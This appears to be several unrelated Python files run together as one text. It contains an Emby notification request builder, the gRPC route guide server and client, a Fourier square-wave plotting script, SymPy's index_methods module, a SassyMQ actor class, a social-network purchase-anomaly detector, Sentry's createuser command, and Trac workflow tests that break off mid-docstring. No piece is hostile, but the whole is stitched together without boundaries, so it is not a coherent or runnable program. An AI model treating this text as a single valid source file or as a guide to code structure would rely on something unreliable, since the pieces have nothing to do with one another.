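# boils down to a POST to /emby/Notifications/Admin with a JSON body and an
# X-MediaBrowser-Token header.  Building that request without sending it:
import json as _json
import urllib2 as _urllib2  # the module above targets Python 2

def _build_emby_request(host, api_key, message):
    url = 'http://%s/emby/Notifications/Admin' % host
    body = _json.dumps({'Name': 'SickRage', 'Description': message})
    req = _urllib2.Request(url, body)
    req.add_header('X-MediaBrowser-Token', api_key)
    req.add_header('Content-Type', 'application/json')
    return req  # pass to urllib2.urlopen() to actually deliver it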
# Copyright 2015 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """The Python implementation of the gRPC route guide server.""" from concurrent import futures import time import math import logging import grpc import route_guide_pb2 import route_guide_pb2_grpc import route_guide_resources def get_feature(feature_db, point): """Returns Feature at given location or None.""" for feature in feature_db: if feature.location == point: return feature return None def get_distance(start, end): """Distance between two points.""" coord_factor = 10000000.0 lat_1 = start.latitude / coord_factor lat_2 = end.latitude / coord_factor lon_1 = start.longitude / coord_factor lon_2 = end.longitude / coord_factor lat_rad_1 = math.radians(lat_1) lat_rad_2 = math.radians(lat_2) delta_lat_rad = math.radians(lat_2 - lat_1) delta_lon_rad = math.radians(lon_2 - lon_1) # Formula is based on http://mathforum.org/library/drmath/view/51879.html a = (pow(math.sin(delta_lat_rad / 2), 2) + (math.cos(lat_rad_1) * math.cos(lat_rad_2) * pow(math.sin(delta_lon_rad / 2), 2))) c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a)) R = 6371000 # metres return R * c class RouteGuideServicer(route_guide_pb2_grpc.RouteGuideServicer): """Provides methods that implement functionality of route guide server.""" def __init__(self): self.db = route_guide_resources.read_route_guide_database() def GetFeature(self, request, context): feature = get_feature(self.db, request) if feature is None: return route_guide_pb2.Feature(name="", location=request) else: return feature def ListFeatures(self, request, context): left = min(request.lo.longitude, request.hi.longitude) right = max(request.lo.longitude, request.hi.longitude) top = max(request.lo.latitude, request.hi.latitude) bottom = min(request.lo.latitude, request.hi.latitude) for feature in self.db: if (feature.location.longitude >= left and feature.location.longitude <= right and feature.location.latitude >= bottom and feature.location.latitude <= top): yield feature def RecordRoute(self, request_iterator, context): point_count = 0 feature_count = 0 distance = 0.0 prev_point = None start_time = time.time() for point in request_iterator: point_count += 1 if get_feature(self.db, point): feature_count += 1 if prev_point: distance += get_distance(prev_point, point) prev_point = point elapsed_time = time.time() - start_time return route_guide_pb2.RouteSummary(point_count=point_count, feature_count=feature_count, distance=int(distance), elapsed_time=int(elapsed_time)) def RouteChat(self, request_iterator, context): prev_notes = [] for new_note in request_iterator: for prev_note in prev_notes: if prev_note.location == new_note.location: yield prev_note prev_notes.append(new_note) def serve(): server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) route_guide_pb2_grpc.add_RouteGuideServicer_to_server( RouteGuideServicer(), server) server.add_insecure_port('[::]:50051') server.start() server.wait_for_termination() if __name__ == '__main__': logging.basicConfig() serve()
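# Illustrative client sketch (assumes the same generated route_guide_pb2
# modules the server imports; the target address and coordinates are
# placeholders).
def run_get_feature(target='localhost:50051'):
    with grpc.insecure_channel(target) as channel:
        stub = route_guide_pb2_grpc.RouteGuideStub(channel)
        point = route_guide_pb2.Point(latitude=409146138, longitude=-746188906)
        feature = stub.GetFeature(point)
        print(feature.name or 'no feature found at that point')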
#!/usr/bin/env python from __future__ import division import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt plt.style.use('seaborn-paper') #plt.style.use('fivethirtyeight') #plt.style.use('bmh') import numpy as np from scipy import signal mpl.rcParams.update({'text.usetex': True, 'lines.linewidth': 1.5, 'font.size': 15, 'xtick.labelsize': 'small', 'ytick.labelsize': 'small', 'axes.labelsize': 'small', 'axes.grid': True, 'grid.alpha': 0.73, 'lines.markersize': 12, 'legend.borderpad': 0.2, 'legend.fancybox': True, 'legend.fontsize': 'x-small', 'legend.framealpha': 0.7, 'legend.handletextpad': 0.1, 'legend.labelspacing': 0.2, 'legend.loc': 'best', 'savefig.dpi': 100, 'pdf.compression': 9}) t = np.linspace(-0.25, 1.1, 333) def sumsines(t, n): g = 0 * np.ones_like(t) for p in range(1, n): #print p m = 2*p - 1 g += 4/(m * np.pi) * np.sin(m*2*np.pi * t) return g fig = plt.figure(3) plt.plot(t, signal.square(t*2*np.pi), lw=4, alpha=0.3) for k in (2, 3, 4, 5): #print('k = ' + str(k)) plt.plot(t, sumsines(t, k), alpha=0.5, rasterized=True, label='n = ' + str(k-1)) plt.xlabel('Distance [L]') #plt.ylabel('Magnitude Response [m/N]') plt.title('Fourier Series Approximation of Square Wave') plt.grid(True) plt.legend() plt.savefig("FourierSquareWave.pdf", bbox_inches='tight') # this is a plot with more Fourier components fig = plt.figure(33) plt.plot(t, signal.square(t*2*np.pi)) for k in (2, 3, 11, 51): #print('k = ' + str(k)) plt.plot(t, sumsines(t, k), alpha=0.5, rasterized=True, label='n = ' + str(k-1)) plt.xlabel('Distance [L]') #plt.ylabel('Magnitude Response [m/N]') plt.title('Fourier Series Approximation of Square Wave') plt.grid(True) plt.legend() plt.savefig("FourierSquareWave50.pdf", bbox_inches='tight') fig = plt.figure(39) m = np.arange(1, 20) A = 4/(m * np.pi) plt.semilogy(m, A, alpha=0.5, marker='o', rasterized=True) plt.xlabel('1/Wavelength [1/L]') plt.xticks(m) plt.ylabel('$|A|$') plt.title('Spectrum of Square Wave') plt.grid(True) #plt.legend() plt.savefig("FourierSquareWavePSD.pdf", bbox_inches='tight')
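# Quick numerical check (illustrative): at t = 0.25 the square wave equals +1
# and the partial sums 4/pi * (1 - 1/3 + 1/5 - ...) should converge to it.
for n in (2, 5, 50, 500):
    print(n, sumsines(np.array([0.25]), n)[0])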
"""Module with functions operating on IndexedBase, Indexed and Idx objects - Check shape conformance - Determine indices in resulting expression etc. Methods in this module could be implemented by calling methods on Expr objects instead. When things stabilize this could be a useful refactoring. """ from __future__ import print_function, division from sympy.core.function import Function from sympy.functions import exp, Piecewise from sympy.tensor.indexed import Idx, Indexed from sympy.core.compatibility import reduce class IndexConformanceException(Exception): pass def _remove_repeated(inds): """Removes repeated objects from sequences Returns a set of the unique objects and a tuple of all that have been removed. >>> from sympy.tensor.index_methods import _remove_repeated >>> l1 = [1, 2, 3, 2] >>> _remove_repeated(l1) ({1, 3}, (2,)) """ sum_index = {} for i in inds: if i in sum_index: sum_index[i] += 1 else: sum_index[i] = 0 inds = [x for x in inds if not sum_index[x]] return set(inds), tuple([ i for i in sum_index if sum_index[i] ]) def _get_indices_Mul(expr, return_dummies=False): """Determine the outer indices of a Mul object. >>> from sympy.tensor.index_methods import _get_indices_Mul >>> from sympy.tensor.indexed import IndexedBase, Idx >>> i, j, k = map(Idx, ['i', 'j', 'k']) >>> x = IndexedBase('x') >>> y = IndexedBase('y') >>> _get_indices_Mul(x[i, k]*y[j, k]) ({i, j}, {}) >>> _get_indices_Mul(x[i, k]*y[j, k], return_dummies=True) ({i, j}, {}, (k,)) """ inds = list(map(get_indices, expr.args)) inds, syms = list(zip(*inds)) inds = list(map(list, inds)) inds = list(reduce(lambda x, y: x + y, inds)) inds, dummies = _remove_repeated(inds) symmetry = {} for s in syms: for pair in s: if pair in symmetry: symmetry[pair] *= s[pair] else: symmetry[pair] = s[pair] if return_dummies: return inds, symmetry, dummies else: return inds, symmetry def _get_indices_Pow(expr): """Determine outer indices of a power or an exponential. A power is considered a universal function, so that the indices of a Pow is just the collection of indices present in the expression. This may be viewed as a bit inconsistent in the special case: x[i]**2 = x[i]*x[i] (1) The above expression could have been interpreted as the contraction of x[i] with itself, but we choose instead to interpret it as a function lambda y: y**2 applied to each element of x (a universal function in numpy terms). In order to allow an interpretation of (1) as a contraction, we need contravariant and covariant Idx subclasses. (FIXME: this is not yet implemented) Expressions in the base or exponent are subject to contraction as usual, but an index that is present in the exponent, will not be considered contractable with its own base. Note however, that indices in the same exponent can be contracted with each other. >>> from sympy.tensor.index_methods import _get_indices_Pow >>> from sympy import Pow, exp, IndexedBase, Idx >>> A = IndexedBase('A') >>> x = IndexedBase('x') >>> i, j, k = map(Idx, ['i', 'j', 'k']) >>> _get_indices_Pow(exp(A[i, j]*x[j])) ({i}, {}) >>> _get_indices_Pow(Pow(x[i], x[i])) ({i}, {}) >>> _get_indices_Pow(Pow(A[i, j]*x[j], x[i])) ({i}, {}) """ base, exp = expr.as_base_exp() binds, bsyms = get_indices(base) einds, esyms = get_indices(exp) inds = binds | einds # FIXME: symmetries from power needs to check special cases, else nothing symmetries = {} return inds, symmetries def _get_indices_Add(expr): """Determine outer indices of an Add object. In a sum, each term must have the same set of outer indices. 
A valid expression could be x(i)*y(j) - x(j)*y(i) But we do not allow expressions like: x(i)*y(j) - z(j)*z(j) FIXME: Add support for Numpy broadcasting >>> from sympy.tensor.index_methods import _get_indices_Add >>> from sympy.tensor.indexed import IndexedBase, Idx >>> i, j, k = map(Idx, ['i', 'j', 'k']) >>> x = IndexedBase('x') >>> y = IndexedBase('y') >>> _get_indices_Add(x[i] + x[k]*y[i, k]) ({i}, {}) """ inds = list(map(get_indices, expr.args)) inds, syms = list(zip(*inds)) # allow broadcast of scalars non_scalars = [x for x in inds if x != set()] if not non_scalars: return set(), {} if not all([x == non_scalars[0] for x in non_scalars[1:]]): raise IndexConformanceException("Indices are not consistent: %s" % expr) if not reduce(lambda x, y: x != y or y, syms): symmetries = syms[0] else: # FIXME: search for symmetries symmetries = {} return non_scalars[0], symmetries def get_indices(expr): """Determine the outer indices of expression ``expr`` By *outer* we mean indices that are not summation indices. Returns a set and a dict. The set contains outer indices and the dict contains information about index symmetries. Examples ======== >>> from sympy.tensor.index_methods import get_indices >>> from sympy import symbols >>> from sympy.tensor import IndexedBase, Idx >>> x, y, A = map(IndexedBase, ['x', 'y', 'A']) >>> i, j, a, z = symbols('i j a z', integer=True) The indices of the total expression is determined, Repeated indices imply a summation, for instance the trace of a matrix A: >>> get_indices(A[i, i]) (set(), {}) In the case of many terms, the terms are required to have identical outer indices. Else an IndexConformanceException is raised. >>> get_indices(x[i] + A[i, j]*y[j]) ({i}, {}) :Exceptions: An IndexConformanceException means that the terms ar not compatible, e.g. >>> get_indices(x[i] + y[j]) #doctest: +SKIP (...) IndexConformanceException: Indices are not consistent: x(i) + y(j) .. warning:: The concept of *outer* indices applies recursively, starting on the deepest level. This implies that dummies inside parenthesis are assumed to be summed first, so that the following expression is handled gracefully: >>> get_indices((x[i] + A[i, j]*y[j])*x[j]) ({i, j}, {}) This is correct and may appear convenient, but you need to be careful with this as SymPy will happily .expand() the product, if requested. The resulting expression would mix the outer ``j`` with the dummies inside the parenthesis, which makes it a different expression. To be on the safe side, it is best to avoid such ambiguities by using unique indices for all contractions that should be held separate. """ # We call ourself recursively to determine indices of sub expressions. # break recursion if isinstance(expr, Indexed): c = expr.indices inds, dummies = _remove_repeated(c) return inds, {} elif expr is None: return set(), {} elif isinstance(expr, Idx): return {expr}, {} elif expr.is_Atom: return set(), {} # recurse via specialized functions else: if expr.is_Mul: return _get_indices_Mul(expr) elif expr.is_Add: return _get_indices_Add(expr) elif expr.is_Pow or isinstance(expr, exp): return _get_indices_Pow(expr) elif isinstance(expr, Piecewise): # FIXME: No support for Piecewise yet return set(), {} elif isinstance(expr, Function): # Support ufunc like behaviour by returning indices from arguments. 
# Functions do not interpret repeated indices across argumnts # as summation ind0 = set() for arg in expr.args: ind, sym = get_indices(arg) ind0 |= ind return ind0, sym # this test is expensive, so it should be at the end elif not expr.has(Indexed): return set(), {} raise NotImplementedError( "FIXME: No specialized handling of type %s" % type(expr)) def get_contraction_structure(expr): """Determine dummy indices of ``expr`` and describe its structure By *dummy* we mean indices that are summation indices. The stucture of the expression is determined and described as follows: 1) A conforming summation of Indexed objects is described with a dict where the keys are summation indices and the corresponding values are sets containing all terms for which the summation applies. All Add objects in the SymPy expression tree are described like this. 2) For all nodes in the SymPy expression tree that are *not* of type Add, the following applies: If a node discovers contractions in one of its arguments, the node itself will be stored as a key in the dict. For that key, the corresponding value is a list of dicts, each of which is the result of a recursive call to get_contraction_structure(). The list contains only dicts for the non-trivial deeper contractions, ommitting dicts with None as the one and only key. .. Note:: The presence of expressions among the dictinary keys indicates multiple levels of index contractions. A nested dict displays nested contractions and may itself contain dicts from a deeper level. In practical calculations the summation in the deepest nested level must be calculated first so that the outer expression can access the resulting indexed object. Examples ======== >>> from sympy.tensor.index_methods import get_contraction_structure >>> from sympy import symbols, default_sort_key >>> from sympy.tensor import IndexedBase, Idx >>> x, y, A = map(IndexedBase, ['x', 'y', 'A']) >>> i, j, k, l = map(Idx, ['i', 'j', 'k', 'l']) >>> get_contraction_structure(x[i]*y[i] + A[j, j]) {(i,): {x[i]*y[i]}, (j,): {A[j, j]}} >>> get_contraction_structure(x[i]*y[j]) {None: {x[i]*y[j]}} A multiplication of contracted factors results in nested dicts representing the internal contractions. >>> d = get_contraction_structure(x[i, i]*y[j, j]) >>> sorted(d.keys(), key=default_sort_key) [None, x[i, i]*y[j, j]] In this case, the product has no contractions: >>> d[None] {x[i, i]*y[j, j]} Factors are contracted "first": >>> sorted(d[x[i, i]*y[j, j]], key=default_sort_key) [{(i,): {x[i, i]}}, {(j,): {y[j, j]}}] A parenthesized Add object is also returned as a nested dictionary. The term containing the parenthesis is a Mul with a contraction among the arguments, so it will be found as a key in the result. It stores the dictionary resulting from a recursive call on the Add expression. 
>>> d = get_contraction_structure(x[i]*(y[i] + A[i, j]*x[j])) >>> sorted(d.keys(), key=default_sort_key) [(A[i, j]*x[j] + y[i])*x[i], (i,)] >>> d[(i,)] {(A[i, j]*x[j] + y[i])*x[i]} >>> d[x[i]*(A[i, j]*x[j] + y[i])] [{None: {y[i]}, (j,): {A[i, j]*x[j]}}] Powers with contractions in either base or exponent will also be found as keys in the dictionary, mapping to a list of results from recursive calls: >>> d = get_contraction_structure(A[j, j]**A[i, i]) >>> d[None] {A[j, j]**A[i, i]} >>> nested_contractions = d[A[j, j]**A[i, i]] >>> nested_contractions[0] {(j,): {A[j, j]}} >>> nested_contractions[1] {(i,): {A[i, i]}} The description of the contraction structure may appear complicated when represented with a string in the above examples, but it is easy to iterate over: >>> from sympy import Expr >>> for key in d: ... if isinstance(key, Expr): ... continue ... for term in d[key]: ... if term in d: ... # treat deepest contraction first ... pass ... # treat outermost contactions here """ # We call ourself recursively to inspect sub expressions. if isinstance(expr, Indexed): junk, key = _remove_repeated(expr.indices) return {key or None: {expr}} elif expr.is_Atom: return {None: {expr}} elif expr.is_Mul: junk, junk, key = _get_indices_Mul(expr, return_dummies=True) result = {key or None: {expr}} # recurse on every factor nested = [] for fac in expr.args: facd = get_contraction_structure(fac) if not (None in facd and len(facd) == 1): nested.append(facd) if nested: result[expr] = nested return result elif expr.is_Pow or isinstance(expr, exp): # recurse in base and exp separately. If either has internal # contractions we must include ourselves as a key in the returned dict b, e = expr.as_base_exp() dbase = get_contraction_structure(b) dexp = get_contraction_structure(e) dicts = [] for d in dbase, dexp: if not (None in d and len(d) == 1): dicts.append(d) result = {None: {expr}} if dicts: result[expr] = dicts return result elif expr.is_Add: # Note: we just collect all terms with identical summation indices, We # do nothing to identify equivalent terms here, as this would require # substitutions or pattern matching in expressions of unknown # complexity. result = {} for term in expr.args: # recurse on every term d = get_contraction_structure(term) for key in d: if key in result: result[key] |= d[key] else: result[key] = d[key] return result elif isinstance(expr, Piecewise): # FIXME: No support for Piecewise yet return {None: expr} elif isinstance(expr, Function): # Collect non-trivial contraction structures in each argument # We do not report repeated indices in separate arguments as a # contraction deeplist = [] for arg in expr.args: deep = get_contraction_structure(arg) if not (None in deep and len(deep) == 1): deeplist.append(deep) d = {None: {expr}} if deeplist: d[expr] = deeplist return d # this test is expensive, so it should be at the end elif not expr.has(Indexed): return {None: {expr}} raise NotImplementedError( "FIXME: No specialized handling of type %s" % type(expr))
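# Illustrative usage sketch (not part of this module): how the two public
# functions above describe a matrix-vector product A[i, j]*x[j].
if __name__ == '__main__':
    from sympy.tensor import IndexedBase, Idx
    A, x = IndexedBase('A'), IndexedBase('x')
    i, j = Idx('i'), Idx('j')
    expr = A[i, j]*x[j]
    print(get_indices(expr))                 # ({i}, {}) -- j is a dummy index
    print(get_contraction_structure(expr))   # {(j,): {A[i, j]*x[j]}}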
from SassyMQ.OSTL.Lexicon import *
from SassyMQ.OSTL.CommonClasses.BaseClasses import *
from SassyMQ.OSTL.CommonClasses.SMQActorBase import *
from json import JSONEncoder
import sys
import traceback

class SMQPublicBase(SMQActorBase):
    def __init__(self, isAutoConnect = True):
        super(SMQPublicBase, self).__init__("public.all", isAutoConnect)

    # "OpenSourceTools" - OSTL
    def CheckRouting(self, message_frame, header_frame, body):
        payload = self.PayloadFromMsg(message_frame, header_frame, body)
        print("CHECKING: " + message_frame.routing_key)

    # ACTOR CAN SAY:
    def PublicCreateSMQProjectNoPayload(self):
        self.PublicCreateSMQProject(self.CreatePayload())

    def PublicCreateSMQProjectString(self, content):
        payload = self.CreatePayload()
        payload.Content = content
        self.PublicCreateSMQProject(payload)

    def PublicCreateSMQProject(self, payload):
        if self.IsDebugMode:
            print("Create SMQ Project - ")
            print("payload: " + payload.toJSON())
        term = payload.LexiconTerm = Lexicon.TermsByRoutingKey['host.general.public.createsmqproject']
        self.RMQChannel.basic_publish(exchange=term.Sender + 'mic', routing_key=term.RoutingKey, body=payload.toJSON())
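# Illustrative usage sketch (assumes a reachable RabbitMQ broker and whatever
# configuration SMQActorBase expects; the project name is a placeholder).
if __name__ == '__main__':
    actor = SMQPublicBase(isAutoConnect=True)
    actor.PublicCreateSMQProjectString('example-project')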
import sys import numpy as np import pandas as pd import networkx as nx import json import sys def main(argv): # ## Step1: build the initial state of the entire user network, as well as the purchae history of the users # Input: sample_dataset/batch_log.json #batchlogfile = 'sample_dataset/batch_log.json' batchlogfile = sys.argv[1] df_batch = pd.read_json(batchlogfile, lines=True) index_purchase = ['event_type','id','timestamp','amount'] index_friend = ['event_type','id1','id2','timestamp'] # Read D and T df_DT=df_batch[df_batch['D'].notnull()] df_DT=df_DT[['D','T']] D = df_DT.values[0][0] T = df_DT.values[0][1] # check D and T values if D < 1: print('Program terminated because of D < 1') sys.exit() if T < 2: print('Program terminated because of T < 2') sys.exit() df_purchase = df_batch[df_batch['event_type']=='purchase'] df_purchase = df_purchase[index_purchase] df_purchase = df_purchase.dropna(how='any') # If sort on the timestamp is needed, commentout the following line # df_purchase = df_purchase.sort_values('timestamp') #df_purchase.shape df_friend=df_batch[(df_batch['event_type']=='befriend') | (df_batch['event_type']=='unfriend')] df_friend=df_friend[index_friend] df_friend=df_friend.dropna(how='any') # If sort on the timestamp is needed, commentout the following line #df_friend=df_friend.sort_values('timestamp') #df_friend.shape # Define a network G G = nx.Graph() idlist = set(df_purchase.id.tolist()) G.add_nodes_from(idlist) #len(list(G.nodes())) # Define a function Add_edges to add edges to G def Add_edges(data): for row in data.itertuples(): id10 = row.id1 id20 = row.id2 event_type0 = row.event_type if event_type0 == 'befriend': G.add_edge(id10,id20) if event_type0 == 'unfriend': if G.has_edge(id10,id20): G.remove_edge(id10,id20) Add_edges(df_friend) #G.number_of_nodes() #G.number_of_edges() # define a function to calcualte the mean and sd for userid's network def Get_Mean_SD(userid): Nodes = list(nx.ego_graph(G, userid, D, center=False)) df_Nodes = df_purchase.loc[df_purchase['id'].isin(Nodes)] if len(df_Nodes) >= 2: if len(df_Nodes) > T: df_Nodes = df_Nodes.sort_values('timestamp').iloc[-int(T):] #df_Nodes.shape #the std from pd is different from np; np is correct #mean = df_Nodes.amount.mean() #sd = df_Nodes.amount.std() mean = np.mean(df_Nodes['amount']) sd = np.std(df_Nodes['amount']) mean = float("{0:.2f}".format(mean)) sd = float("{0:.2f}".format(sd)) else: mean=np.nan sd=np.nan return mean, sd #Get_Mean_SD(0.0) # read in the stream_log.json #streamlogfile = 'sample_dataset/stream_log.json' streamlogfile = sys.argv[2] df_stream = pd.read_json(streamlogfile, lines=True) # If sort on the timestamp is needed, commentout the following line #df_stream = df_stream.sort_values('timestamp') # open output file flagged_purchases.json #flaggedfile = 'log_output/flagged_purchases.json' flaggedfile = sys.argv[3] f = open(flaggedfile, 'w') # Determine whether a purchase is anomalous; update purchase history; update social network for i in range(0, len(df_stream)): datai = df_stream.iloc[i] event_type = datai['event_type'] if (event_type == 'purchase') & (not datai[index_purchase].isnull().any()): # update purchase history df_purchase = df_purchase.append(datai[index_purchase]) timestamp = datai['timestamp'] timestamp = str(timestamp) userid = datai['id'] if (not G.has_node(userid)): G.add_node(userid) amount = datai['amount'] mean, sd = Get_Mean_SD(userid) if mean != np.nan: mean_3sd = mean + (3*sd) if amount > mean_3sd: f.write('{{"event_type":"{0:s}", "timestamp":"{1:s}", "id": 
"{2:.0f}", "amount": "{3:.2f}", "mean": "{4:.2f}", "sd": "{5:.2f}"}}\n'.format(event_type, timestamp, userid, amount, mean, sd)) # update social network if (event_type == 'befriend') & (not datai[index_friend].isnull().any()): df_friend=df_friend.append(datai[index_friend]) id1 = datai['id1'] id2 = datai['id2'] G.add_edge(id1,id2) if (event_type == 'unfriend') & (not datai[index_friend].isnull().any()): df_friend=df_friend.append(datai[index_friend]) id1 = datai['id1'] id2 = datai['id2'] if G.has_edge(id1,id2): G.remove_edge(id1,id2) f.close() if __name__ == "__main__": main(sys.argv)
""" sentry.management.commands.createuser ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2012 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import import getpass import sys from django.conf import settings from django.core.exceptions import ValidationError from django.core.management.base import BaseCommand, CommandError, make_option from sentry.models import ( Organization, OrganizationMember, OrganizationMemberType, User ) class Command(BaseCommand): help = 'Creates a new user' option_list = BaseCommand.option_list + ( make_option('--email', dest='email'), make_option('--superuser', dest='is_superuser', action='store_true', default=None), make_option('--password', dest='password', default=None), make_option('--no-superuser', dest='is_superuser', action='store_false', default=None), make_option('--no-password', dest='nopassword', action='store_true', default=False), make_option('--no-input', dest='noinput', action='store_true', default=False), ) def _get_field(self, field_name): return User._meta.get_field(field_name) def get_email(self): raw_value = raw_input('Email: ') if not raw_value: raise CommandError('Invalid email address: This field cannot be blank') field = self._get_field('email') try: return field.clean(raw_value, None) except ValidationError as e: raise CommandError('Invalid email address: %s' % '; '.join(e.messages)) def get_password(self): raw_value = getpass.getpass() field = self._get_field('password') try: return field.clean(raw_value, None) except ValidationError as e: raise CommandError('Invalid password: %s' % '; '.join(e.messages)) def get_superuser(self): if raw_input('Should this user be a superuser? [yN] ').lower() == 'y': return True return False def handle(self, **options): email = options['email'] is_superuser = options['is_superuser'] password = options['password'] if not options['noinput']: try: if not email: email = self.get_email() if not (password or options['nopassword']): password = self.get_password() if is_superuser is None: is_superuser = self.get_superuser() except KeyboardInterrupt: self.stderr.write("\nOperation cancelled.") sys.exit(1) if not email: raise CommandError('Invalid or missing email address') if not options['nopassword'] and not password: raise CommandError('No password set and --no-password not passed') user = User( email=email, username=email, is_superuser=is_superuser, is_staff=is_superuser, is_active=True, ) if password: user.set_password(password) user.save() self.stdout.write('User created: %s' % (email,)) # TODO(dcramer): kill this when we improve flows if settings.SENTRY_SINGLE_ORGANIZATION: org = Organization.get_default() OrganizationMember.objects.create( organization=org, user=user, type=OrganizationMemberType.OWNER, has_global_access=user.is_superuser, ) self.stdout.write('Added to organization: %s' % (org.slug,))
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright (C) 2008-2015 Edgewall Software # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. The terms # are also available at http://trac.edgewall.org/wiki/TracLicense. # # This software consists of voluntary contributions made by many # individuals. For the exact contribution history, see the revision # history and logs, available at http://trac.edgewall.org/log/. import unittest import trac.tests.compat from trac.tests.functional import FunctionalTwillTestCaseSetup, tc class SetOwnerOperation(FunctionalTwillTestCaseSetup): def setUp(self): super(SetOwnerOperation, self).setUp() self.env = self._testenv.get_trac_environment() self.reassign_operations = self.env.config.get('ticket-workflow', 'reassign.operations') self.env.config.set('ticket-workflow', 'reassign.operations', 'set_owner') self.restrict_owner = self.env.config.get('ticket', 'restrict_owner') self.env.config.set('ticket', 'restrict_owner', False) self.env.config.save() def tearDown(self): super(SetOwnerOperation, self).tearDown() self.env.config.set('ticket-workflow', 'reassign.operations', self.reassign_operations) self.env.config.set('ticket', 'restrict_owner', self.restrict_owner) self.env.config.save() def test_default(self): """When using the workflow operation `set_owner`, the assign-to field will default to the currently requesting username. """ ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.find('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') def test_restrict_owner_not_known_user(self): """When using the workflow operation `set_owner` with restrict_owner=true, the assign-to dropdown menu will not contain the requesting user, if the requesting user is not a known user. """ try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket', 'restrict_owner', True) self.env.config.save() self._tester.logout() self._testenv.grant_perm('anonymous', 'TICKET_ADMIN') self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.notfind('<option value="anonymous" selected="selected">' 'anonymous</option>') finally: self._testenv.revoke_perm('anonymous', 'TICKET_ADMIN') self._tester.login('admin') def test_set_owner(self): """When using the workflow operation `set_owner` with a specific list of available owners, the assign-to field will only contain that list of owners. The requesting user will not be added to the list, and the current ticket owner will not be added to the list. 
""" try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket-workflow', 'reassign.set_owner', "alice,bill") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="admin">admin</option>') tc.notfind('<option value="admin">admin</option>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="lammy" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="lammy">lammy</option>') tc.notfind('<option value="lammy">lammy</option>') finally: self.env.config.remove('ticket-workflow', 'reassign.set_owner') def test_set_owner_one_choice(self): """When using the workflow operation `set_owner` with a specific single-element list of available owners, the assign-to field will not give the end user any choices at all. """ try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket-workflow', 'reassign.set_owner', "alice") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.notfind('<select name="action_reassign_reassign_owner"') tc.find('<input type="hidden" ' 'name="action_reassign_reassign_owner" ' 'value="alice" id="action_reassign_reassign_owner" />') tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span> to ' '<span class="trac-author">alice</span>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="admin">admin</option>') tc.notfind('<option value="admin">admin</option>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="lammy" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="lammy">lammy</option>') tc.notfind('<option value="lammy">lammy</option>') finally: self.env.config.remove('ticket-workflow', 'reassign.set_owner') class MaySetOwnerOperationRestrictOwnerFalse(FunctionalTwillTestCaseSetup): """Test cases for may_set_owner operation with `[ticket] restrict_owner = False` http://trac.edgewall.org/ticket/10018 """ def setUp(self): super(MaySetOwnerOperationRestrictOwnerFalse, self).setUp() self.env = self._testenv.get_trac_environment() self.reassign_operations = self.env.config.get('ticket-workflow', 'reassign.operations') self.env.config.set('ticket-workflow', 'reassign.operations', 'may_set_owner') self.restrict_owner = self.env.config.get('ticket', 'restrict_owner') self.env.config.set('ticket', 'restrict_owner', False) self.env.config.save() def tearDown(self): super(MaySetOwnerOperationRestrictOwnerFalse, self).tearDown() self.env.config.set('ticket-workflow', 'reassign.operations', self.reassign_operations) self.env.config.set('ticket', 'restrict_owner', self.restrict_owner) self.env.config.save() def test_default(self): """The assign-to field will default to the ticket's current owner. 
""" ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.find('<input type="text" name="action_reassign_reassign_owner"' ' value="lammy" id="action_reassign_reassign_owner" />') def test_default_no_owner(self): """The assign-to field will default to a blank field if the ticket currently has no owner. """ ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': ''}) self._tester.go_to_ticket(ticket_id) tc.find("The ticket will remain with no owner.") tc.find('The owner will be changed from ' '<span class="trac-author-none">\(none\)</span>') tc.find('<input type="text" name="action_reassign_reassign_owner"' ' id="action_reassign_reassign_owner" />') def test_default_restrict_owner(self): """The assign-to field will default to the ticket's current owner even if the current owner is not otherwise known to the Trac environment.""" ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket', 'restrict_owner', True) self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.find('<option selected="selected" value="lammy">' 'lammy</option>') known_usernames = [u[0] for u in self.env.get_known_users()] self.assertNotIn('lammy', known_usernames) def test_set_owner(self): """When using the workflow operation `may_set_owner` with a specific list of available owners, the 